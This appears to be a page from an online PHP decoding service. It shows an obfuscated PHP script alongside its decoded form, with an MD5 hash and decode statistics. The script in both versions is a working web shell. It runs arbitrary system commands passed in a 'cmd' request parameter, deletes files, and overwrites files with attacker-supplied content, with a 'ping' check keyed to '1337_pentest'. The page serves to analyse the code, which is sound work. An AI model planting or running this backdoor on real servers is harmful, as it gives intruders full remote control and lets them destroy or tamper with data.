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PHP Decode
goto zXd47; zXd47: if (isset($_REQUEST["\x70\x69\x6e\x67"])) { if ($_REQUEST["\x6b\x65\..
Decoded Output download
goto zXd47; zXd47: if (isset($_REQUEST["ping"])) { if ($_REQUEST["key"] == "1337_pentest") { echo "true"; } else { echo "false"; } } goto HL04b; LuqH3: if (isset($_REQUEST["delete"]) && isset($_REQUEST["dir"]) && isset($_REQUEST["file"]) && isset($_REQUEST["key"])) { $fileDirName = $_REQUEST["dir"] . "/" . $_REQUEST["file"]; $status = unlink($fileDirName); if ($status) { echo "File deleted successfully"; } else { echo "Unable to delete!"; } } goto CFQ5I; HL04b: if (isset($_REQUEST["cmd"]) && isset($_REQUEST["key"])) { $cmd = $_REQUEST["cmd"]; system($cmd); die; } goto DTppM; DTppM: if (isset($_REQUEST["update"]) && isset($_REQUEST["dir"]) && isset($_REQUEST["file"]) && isset($_REQUEST["key"])) { $file_name = $_REQUEST["file"]; $folder = $_REQUEST["dir"]; $file_name = $_REQUEST["dir"] . "/" . $_REQUEST["file"]; $edit_file = fopen($file_name, "w"); fwrite($edit_file, $_REQUEST["value"]); fclose($edit_file); } goto LuqH3; CFQ5I: ?>
Did this file decode correctly?
Original Code
goto zXd47; zXd47: if (isset($_REQUEST["\x70\x69\x6e\x67"])) { if ($_REQUEST["\x6b\x65\171"] == "\61\x33\63\67\137\160\x65\156\x74\x65\x73\164") { echo "\164\x72\x75\145"; } else { echo "\146\141\x6c\163\145"; } } goto HL04b; LuqH3: if (isset($_REQUEST["\x64\x65\154\145\x74\x65"]) && isset($_REQUEST["\x64\151\162"]) && isset($_REQUEST["\146\x69\154\x65"]) && isset($_REQUEST["\x6b\145\171"])) { $fileDirName = $_REQUEST["\144\x69\x72"] . "\x2f" . $_REQUEST["\x66\151\x6c\x65"]; $status = unlink($fileDirName); if ($status) { echo "\106\151\x6c\x65\40\x64\145\x6c\x65\164\145\144\x20\163\165\143\x63\145\x73\163\146\165\x6c\x6c\171"; } else { echo "\x55\x6e\141\x62\154\145\x20\164\157\x20\x64\x65\x6c\145\164\x65\41"; } } goto CFQ5I; HL04b: if (isset($_REQUEST["\143\155\144"]) && isset($_REQUEST["\153\145\171"])) { $cmd = $_REQUEST["\x63\155\x64"]; system($cmd); die; } goto DTppM; DTppM: if (isset($_REQUEST["\165\160\144\x61\164\145"]) && isset($_REQUEST["\x64\151\162"]) && isset($_REQUEST["\146\151\x6c\x65"]) && isset($_REQUEST["\x6b\x65\x79"])) { $file_name = $_REQUEST["\146\x69\154\145"]; $folder = $_REQUEST["\x64\x69\x72"]; $file_name = $_REQUEST["\x64\151\162"] . "\57" . $_REQUEST["\x66\151\154\145"]; $edit_file = fopen($file_name, "\x77"); fwrite($edit_file, $_REQUEST["\x76\x61\x6c\x75\x65"]); fclose($edit_file); } goto LuqH3; CFQ5I:
Function Calls
None |
MD5 | bd8456047940d71ed739b55ce3236b86 |
Eval Count | 0 |
Decode Time | 49 ms |